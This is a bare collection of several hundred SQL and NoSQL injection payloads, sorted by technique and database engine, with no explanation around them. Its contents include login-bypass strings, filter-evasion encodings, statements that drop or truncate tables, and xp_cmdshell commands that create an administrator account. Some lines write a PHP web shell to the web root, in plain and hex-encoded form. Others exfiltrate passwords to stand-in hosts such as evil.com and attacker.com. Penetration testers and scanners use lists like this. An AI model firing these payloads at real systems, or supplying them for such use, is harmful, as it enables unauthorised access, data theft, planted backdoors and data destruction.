# SQL Injection Payloads - Comprehensive Collection (500+)
# Categories: Authentication Bypass, Union-Based, Error-Based, Blind, Time-Based, Stacked Queries

# ==================== AUTHENTICATION BYPASS ====================
' OR '1'='1
" OR "1"="1
' OR '1'='1' --
" OR "1"="1" --
' OR '1'='1' #
" OR "1"="1" #
' OR '1'='1'/*
" OR "1"="1"/*
' OR 1=1 --
" OR 1=1 --
' OR 1=1 #
" OR 1=1 #
' OR 1=1/*
" OR 1=1/*
'OR'1
'OR'1'='1
'OR''='
"OR""="
'OR'='
"OR"="
' OR 'x'='x
" OR "x"="x
' OR 'a'='a
" OR "a"="a
') OR ('1'='1
") OR ("1"="1
')) OR (('1'='1
")) OR (("1"="1
') OR ('1'='1' --
") OR ("1"="1" --
') OR '1'='1' --
") OR "1"="1" --
admin' --
admin' #
admin'/*
admin' OR '1'='1
admin' OR '1'='1' --
admin' OR '1'='1' #
admin' OR 1=1 --
admin' OR 1=1 #
admin'--
admin'#
admin'/*
' OR ''='
" OR ""="
' OR true --
" OR true --
' OR 1 --
" OR 1 --
1' OR '1'='1
1" OR "1"="1
1' OR 1=1 --
1" OR 1=1 --
1' OR 1=1#
1" OR 1=1#
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
or true--
" or true--
' or true--
") or true--
') or true--
or true#
" or true#
' or true#
") or true#
') or true#
'-'
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"

# ==================== UNION-BASED INJECTION ====================
' UNION SELECT NULL --
' UNION SELECT NULL, NULL --
' UNION SELECT NULL, NULL, NULL --
' UNION SELECT NULL, NULL, NULL, NULL --
' UNION SELECT NULL, NULL, NULL, NULL, NULL --
" UNION SELECT NULL --
" UNION SELECT NULL, NULL --
" UNION SELECT NULL, NULL, NULL --
') UNION SELECT NULL --
") UNION SELECT NULL --
' UNION SELECT 1 --
' UNION SELECT 1, 2 --
' UNION SELECT 1, 2, 3 --
' UNION SELECT 1, 2, 3, 4 --
' UNION SELECT 1, 2, 3, 4, 5 --
' UNION SELECT 'a' --
' UNION SELECT 'a', 'b' --
' UNION SELECT 'a', 'b', 'c' --
' UNION ALL SELECT NULL --
' UNION ALL SELECT NULL, NULL --
' UNION ALL SELECT NULL, NULL, NULL --
' UNION ALL SELECT 1, 2, 3 --
' UNION SELECT username, password FROM users --
' UNION SELECT user(), version() --
' UNION SELECT @@version, NULL --
' UNION SELECT database(), user() --
' UNION SELECT table_name, NULL FROM information_schema.tables --
' UNION SELECT column_name, NULL FROM information_schema.columns --
' UNION SELECT group_concat(table_name) FROM information_schema.tables --
' UNION SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name='users' --
' UNION SELECT concat(username,':',password) FROM users --
' UNION SELECT concat_ws(':',username,password) FROM users --
' UNION SELECT username FROM users WHERE username='admin' --
' UNION SELECT load_file('/etc/passwd') --
' UNION SELECT 0x3c3f706870206563686f2073797374656d28245f4745545b2763275d293b3f3e INTO OUTFILE '/var/www/shell.php' --
' UNION SELECT NULL, NULL INTO OUTFILE '/tmp/test' --
1' UNION SELECT NULL--
1' UNION SELECT NULL, NULL--
1' UNION SELECT NULL, NULL, NULL--
-1' UNION SELECT 1, 2, 3 --
0' UNION SELECT 1, 2, 3 --
99999' UNION SELECT 1, 2, 3 --
' ORDER BY 1 --
' ORDER BY 2 --
' ORDER BY 3 --
' ORDER BY 4 --
' ORDER BY 5 --
' ORDER BY 10 --
' ORDER BY 100 --
1' ORDER BY 1 --
1' ORDER BY 2 --
1' ORDER BY 10 --
' GROUP BY 1 --
' GROUP BY 10 --

# ==================== ERROR-BASED INJECTION ====================
' AND extractvalue(1, concat(0x7e, version())) --
' AND extractvalue(1, concat(0x7e, database())) --
' AND extractvalue(1, concat(0x7e, user())) --
' AND extractvalue(1, concat(0x7e, (SELECT table_name FROM information_schema.tables LIMIT 0,1))) --
' AND updatexml(1, concat(0x7e, version()), 1) --
' AND updatexml(1, concat(0x7e, database()), 1) --
' AND updatexml(1, concat(0x7e, user()), 1) --
' AND updatexml(1, concat(0x7e, (SELECT table_name FROM information_schema.tables LIMIT 0,1)), 1) --
' AND (SELECT 1 FROM (SELECT COUNT(*), concat(version(), floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) --
' AND (SELECT 1 FROM (SELECT COUNT(*), concat(database(), floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) --
' AND (SELECT 1 FROM (SELECT COUNT(*), concat(user(), floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) --
' AND exp(~(SELECT * FROM (SELECT version())a)) --
' AND pow(999,999) --
' AND geometrycollection((SELECT * FROM (SELECT * FROM (SELECT version())a)b)) --
' AND multipoint((SELECT * FROM (SELECT * FROM (SELECT version())a)b)) --
' AND polygon((SELECT * FROM (SELECT * FROM (SELECT version())a)b)) --
' AND multipolygon((SELECT * FROM (SELECT * FROM (SELECT version())a)b)) --
' AND linestring((SELECT * FROM (SELECT * FROM (SELECT version())a)b)) --
' AND multilinestring((SELECT * FROM (SELECT * FROM (SELECT version())a)b)) --
1' AND (SELECT 0 FROM (SELECT count(*), concat((SELECT version()), 0x3a, floor(rand()*2)) AS x FROM information_schema.tables GROUP BY x) AS y) --
' AND ROW(1,1) > (SELECT COUNT(*), CONCAT((SELECT version()), 0x3a, floor(rand()*2)) AS x FROM information_schema.tables GROUP BY x) --
' AND GTR(@) --
' AND 1=convert(int,(SELECT top 1 table_name FROM information_schema.tables))--
' AND 1=convert(int,db_name())--

# ==================== BLIND SQL INJECTION - BOOLEAN ====================
' AND 1=1 --
' AND 1=2 --
' AND 'a'='a
' AND 'a'='b
' AND 1=1 AND 'a'='a
1' AND 1=1 --
1' AND 1=2 --
1' AND 1=1#
1' AND 1=2#
1 AND 1=1
1 AND 1=2
' AND substring(version(),1,1)='5
' AND substring(version(),1,1)='8
' AND ascii(substring(version(),1,1))=53 --
' AND ascii(substring(version(),1,1))>50 --
' AND ascii(substring(version(),1,1))<60 --
' AND (SELECT length(database()))=5 --
' AND (SELECT length(database()))>3 --
' AND (SELECT count(*) FROM users)>0 --
' AND (SELECT count(*) FROM users WHERE username='admin')=1 --
' AND (SELECT substring(username,1,1) FROM users LIMIT 0,1)='a' --
' AND (SELECT ascii(substring(username,1,1)) FROM users LIMIT 0,1)>96 --
' AND IF(1=1, 1, 0) --
' AND IF(1=2, 1, 0) --
' AND (SELECT IF(1=1, 1, 0)) --
' AND (SELECT CASE WHEN 1=1 THEN 1 ELSE 0 END) --
' AND (SELECT CASE WHEN 1=2 THEN 1 ELSE 0 END) --
' AND 1=(SELECT 1 FROM dual WHERE 1=1) --
' OR 1=1 LIMIT 1 --
' AND EXISTS(SELECT * FROM users) --
' AND EXISTS(SELECT * FROM users WHERE username='admin') --
' AND NOT EXISTS(SELECT * FROM users WHERE username='nonexistent') --
1' AND '1'='1
1' AND '1'='2
1' AND (1=1)#
1' AND (1=2)#

# ==================== BLIND SQL INJECTION - TIME-BASED ====================
' AND SLEEP(5) --
" AND SLEEP(5) --
' AND SLEEP(5)#
' AND SLEEP(5)/*
' OR SLEEP(5) --
' || SLEEP(5) --
1' AND SLEEP(5) --
1' AND SLEEP(5)#
' AND (SELECT SLEEP(5)) --
' AND (SELECT * FROM (SELECT SLEEP(5))a) --
' AND IF(1=1, SLEEP(5), 0) --
' AND IF(1=2, SLEEP(5), 0) --
' AND IF(version() LIKE '5%', SLEEP(5), 0) --
' AND IF(database() LIKE 'a%', SLEEP(5), 0) --
' AND IF((SELECT count(*) FROM users)>0, SLEEP(5), 0) --
' AND IF(ascii(substring(database(),1,1))>96, SLEEP(5), 0) --
'; WAITFOR DELAY '0:0:5' --
"; WAITFOR DELAY '0:0:5' --
1; WAITFOR DELAY '0:0:5' --
'; WAITFOR DELAY '0:0:5'--
'; WAITFOR TIME '10:00:00' --
' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5) --
' AND 1=DBMS_LOCK.SLEEP(5) --
' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT password FROM users WHERE username='admin')) --
' AND BENCHMARK(10000000, MD5('test')) --
' AND BENCHMARK(10000000, SHA1('test')) --
" AND BENCHMARK(10000000, MD5('test')) --
' OR BENCHMARK(10000000, MD5('test')) --
1' AND BENCHMARK(10000000, MD5('test')) --
' AND (SELECT * FROM (SELECT BENCHMARK(10000000,MD5('test')))a) --
1'; WAITFOR DELAY '0:0:5'--
pg_sleep(5)--
' AND pg_sleep(5) --
' || pg_sleep(5) --
'; SELECT pg_sleep(5) --

# ==================== STACKED QUERIES ====================
'; DROP TABLE users --
"; DROP TABLE users --
'; DROP TABLE users; --
1; DROP TABLE users --
'; DELETE FROM users --
'; DELETE FROM users WHERE 1=1 --
'; TRUNCATE TABLE users --
'; UPDATE users SET password='hacked' --
'; UPDATE users SET password='hacked' WHERE username='admin' --
'; INSERT INTO users VALUES('hacker', 'password') --
'; INSERT INTO users(username,password) VALUES('hacker','pass') --
'; CREATE TABLE pwned(data varchar(100)) --
'; DROP DATABASE test --
'; SHUTDOWN --
'; EXEC xp_cmdshell('whoami') --
'; EXEC xp_cmdshell('dir') --
'; EXEC xp_cmdshell('net user') --
'; EXEC xp_cmdshell('ipconfig') --
'; EXEC master..xp_cmdshell 'whoami' --
'; EXEC sp_configure 'show advanced options', 1 --
'; EXEC sp_configure 'xp_cmdshell', 1 --
'; SELECT * INTO OUTFILE '/tmp/data' --
'; SELECT * INTO OUTFILE '/var/www/shell.php' --
'; SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/shell.php' --
1; SELECT SLEEP(5)
; SELECT SLEEP(5)--

# ==================== COMMENT STYLES ====================
' --
' #
' /*
'--
'#
'/*
" --
" #
" /*
"--
"#
"/*
') --
') #
') /*
")--
")#
")/*
'/**/OR/**/1=1--
'/**/OR/**/1=1#
'/**/OR/**/1=1/*
'/*!OR*/1=1--
'/*!50000OR*/1=1--
'/**/AND/**/1=1--
'/**/UNION/**/SELECT/**/1,2,3--
'/**/UNION/**/ALL/**/SELECT/**/NULL--
+ - ~
;%00
`

# ==================== ENCODING/OBFUSCATION ====================
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%27%20OR%20%27a%27%3D%27a
%27%20UNION%20SELECT%20NULL--
%27%20AND%201%3D1--
%27%20AND%20SLEEP(5)--
' %4fR '1'='1
' %55NION SELECT NULL--
' UN%49ON SELECT NULL--
' UNI%4fN SELECT NULL--
' UNIO%4e SELECT NULL--
' UNION%20SELECT NULL--
' UNION/**/SELECT NULL--
' UN/**/ION/**/SE/**/LECT NULL--
' /*!UNION*/ /*!SELECT*/ NULL--
' /*!50000UNION*/ /*!50000SELECT*/ NULL--
0x27206f722027313d31
CHAR(39)+CHAR(79)+CHAR(82)+CHAR(39)+CHAR(49)+CHAR(39)+CHAR(61)+CHAR(39)+CHAR(49)
CHR(39)||CHR(79)||CHR(82)||CHR(39)||CHR(49)||CHR(39)||CHR(61)||CHR(39)||CHR(49)
' UNI/**/ON SE/**/LECT 1,2,3--
' UNION%0aSELECT%0a1,2,3--
' UNION%0dSELECT%0d1,2,3--
' UNION%0d%0aSELECT%0d%0a1,2,3--
' UNION%09SELECT%091,2,3--
' UNION%0bSELECT%0b1,2,3--
' UNION%0cSELECT%0c1,2,3--
'/**/OR/**/1/**/=/**/1--
'%0aOR%0a1%0a=%0a1--
%2527%2520OR%25201%253D1
%252527%252520OR%2525201%25253D1
' && 1=1 --
' || 1=1 --
' & 1=1 --
' | 1=1 --
'&&'1'='1
'||'1'='1

# ==================== MYSQL SPECIFIC ====================
' OR '1'='1' -- -
' OR 1=1 -- -
' UNION SELECT @@version -- -
' UNION SELECT version() -- -
' UNION SELECT database() -- -
' UNION SELECT user() -- -
' UNION SELECT current_user() -- -
' UNION SELECT schema() -- -
' UNION SELECT @@hostname -- -
' UNION SELECT @@datadir -- -
' UNION SELECT @@basedir -- -
' UNION SELECT @@version_compile_os -- -
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database() -- -
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users' -- -
' UNION SELECT LOAD_FILE('/etc/passwd') -- -
' UNION SELECT LOAD_FILE(0x2f6574632f706173737764) -- -
' INTO OUTFILE '/tmp/test' -- -
' INTO DUMPFILE '/tmp/test' -- -
' UNION SELECT NULL, NULL INTO OUTFILE '/tmp/test' -- -
' UNION SELECT '<?php system($_GET["c"]); ?>' INTO OUTFILE '/var/www/shell.php' -- -

# ==================== MSSQL SPECIFIC ====================
' UNION SELECT @@version --
' UNION SELECT DB_NAME() --
' UNION SELECT user_name() --
' UNION SELECT system_user --
' UNION SELECT @@servername --
' UNION SELECT host_name() --
' UNION SELECT name FROM master..sysdatabases --
' UNION SELECT name FROM sysobjects WHERE xtype='U' --
' UNION SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='users') --
'; EXEC xp_cmdshell('whoami') --
'; EXEC xp_cmdshell('dir c:\') --
'; EXEC xp_cmdshell('type c:\windows\system32\drivers\etc\hosts') --
'; EXEC xp_cmdshell('net user hacker P@ssw0rd /add') --
'; EXEC xp_cmdshell('net localgroup administrators hacker /add') --
'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE --
'; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE --
'; EXEC sp_oacreate 'wscript.shell' --
'; SELECT * FROM OPENROWSET('SQLOLEDB','server';'sa';'password','SELECT 1') --
'; DECLARE @a varchar(8000); SET @a=0x77686F616D69; EXEC(@a) --

# ==================== POSTGRESQL SPECIFIC ====================
' UNION SELECT version() --
' UNION SELECT current_database() --
' UNION SELECT current_user --
' UNION SELECT session_user --
' UNION SELECT current_schema() --
' UNION SELECT usename FROM pg_user --
' UNION SELECT datname FROM pg_database --
' UNION SELECT tablename FROM pg_tables --
' UNION SELECT column_name FROM information_schema.columns --
'; DROP TABLE users --
'; CREATE TABLE cmd_exec(cmd_output text) --
'; COPY cmd_exec FROM PROGRAM 'id' --
'; SELECT * FROM cmd_exec --
' || (SELECT version()) --
' || pg_sleep(5) --
'; SELECT pg_read_file('/etc/passwd') --
'; SELECT pg_ls_dir('/') --
' UNION SELECT NULL,NULL,NULL WHERE 1=cast((SELECT version()) as int) --
' AND 1=CAST((SELECT version()) AS int) --

# ==================== ORACLE SPECIFIC ====================
' UNION SELECT NULL FROM dual --
' UNION SELECT banner FROM v$version --
' UNION SELECT user FROM dual --
' UNION SELECT SYS_CONTEXT('USERENV','DB_NAME') FROM dual --
' UNION SELECT table_name FROM all_tables --
' UNION SELECT column_name FROM all_tab_columns --
' UNION SELECT username FROM all_users --
' AND 1=UTL_HTTP.REQUEST('http://evil.com/'||(SELECT password FROM users WHERE username='admin')) --
' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5) --
' AND 1=DBMS_LOCK.SLEEP(5) --
' AND ROWNUM=1 --
' OR ROWNUM<=5 --
' UNION SELECT NULL,NULL,NULL FROM dual --
' AND 1=(SELECT CASE WHEN 1=1 THEN 1 ELSE 1/0 END FROM dual) --
' AND 1=(SELECT CASE WHEN 1=2 THEN 1 ELSE 1/0 END FROM dual) --
'; EXECUTE IMMEDIATE 'SELECT * FROM users' --

# ==================== SQLITE SPECIFIC ====================
' UNION SELECT sqlite_version() --
' UNION SELECT name FROM sqlite_master WHERE type='table' --
' UNION SELECT sql FROM sqlite_master WHERE type='table' AND name='users' --
' UNION SELECT tbl_name FROM sqlite_master --
' UNION SELECT group_concat(name) FROM sqlite_master WHERE type='table' --
' AND 1=randomblob(100000000) --
' AND 1=like('ABCDEFG',upper(hex(randomblob(100000000)))) --
' UNION SELECT NULL --
1 AND sqlite_version()=sqlite_version()
' OR '1'='1' --

# ==================== NOSQL (MONGODB) ====================
' || '1'=='1
' && '1'=='1
' || 1==1
' && 1==1
'; return true; var x='
'; return this.password; var x='
{$gt: ''}
{$ne: ''}
{$gt: undefined}
{$ne: 1}
{$where: '1==1'}
{$where: 'this.password.length > 0'}
{$regex: '.*'}
{$regex: '^a'}
{"$gt":""}
{"$ne":""}
{"$where":"1==1"}
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1
1, $where: '1 == 1
{ $ne: 1 }
{ $gt: "" }
{ $gt: undefined }
{ $gt: null }
';return(true);var a='
";return(true);var a="

# ==================== FILTER BYPASS ====================
' or 'one'='one
' or 'life'='life
' or 'something'='something
' or 1 like 1
' or 0 like 0
' or '1'like'1
' or 'x' like 'x
' or 1 in (1)
' or 1 in (1,2)
' or 'yes' in ('yes')
' or 1 between 0 and 2
' or 1 between 1 and 1
' or 'a' between 'a' and 'b'
'-'
'%'
'*'
'/'
' '
'+'
'++'
'--'
1-false
1-true
1*56
1*1
1/1
1%1
'=0--+
'<1
'>0
' IS NULL--
' IS NOT NULL--
' REGEXP '1
' RLIKE '1
' NOT IN ('a
' IN ('a
' DIV 0--
' MOD 1--
' XOR 1--
' & 1--
' | 1--
' ^ 1--
'<>'
'<>''

# ==================== SECOND ORDER ====================
admin'-- (stored, then used in query)
' AND (SELECT password FROM users WHERE username='admin')='known' --
'; INSERT INTO log VALUES (@@version) --
1; UPDATE users SET email='attacker@email.com' WHERE username='admin' --

# ==================== OUT OF BAND ====================
' AND LOAD_FILE(concat('\\\\',version(),'.evil.com\\a'))--
' AND (SELECT LOAD_FILE(concat('\\\\',database(),'.evil.com\\a')))--
'; EXEC xp_dirtree '\\attacker.com\share' --
'; EXEC master.dbo.xp_dirtree '\\\\attacker.com\\folder' --
' UNION SELECT UTL_HTTP.REQUEST('http://evil.com/'||(SELECT password FROM users)) FROM dual --
' UNION SELECT DBMS_LDAP.INIT(('evil.com/'||(SELECT password FROM users)),80) FROM dual --
' AND extractvalue(1,concat(0x7e,(SELECT @@version))) --

# ==================== WAF BYPASS ====================
/*!50000UNION*//*!50000SELECT*/1,2,3
%55nion %53elect 1,2,3
+union+select+1,2,3
+UnIoN+SeLeCt+1,2,3
uni<on sel<ect 1,2,3
%252f%252a*/union%252f%252a*/select%252f%252a*/1,2,3
/*!UnIoN*/SeLeCt 1,2,3
un/**/ion sel/**/ect 1,2,3
ID=1+un/**/ion+sel/**/ect+1,2,3--
uni%0bon+se%0blect+1,2,3
%2f%2a*/union%2f%2a*/select%2f%2a*/1,2,3
%2f**%2funion%2f**%2fselect%2f**%2f1,2,3
%23%0Aunion%23%0Aselect%23%0A1,2,3
%23randomText%0Aunion%23randomText%0Aselect%23randomText%0A1,2,3
union(select(1),(2),(3))
union (select 1,2,3)
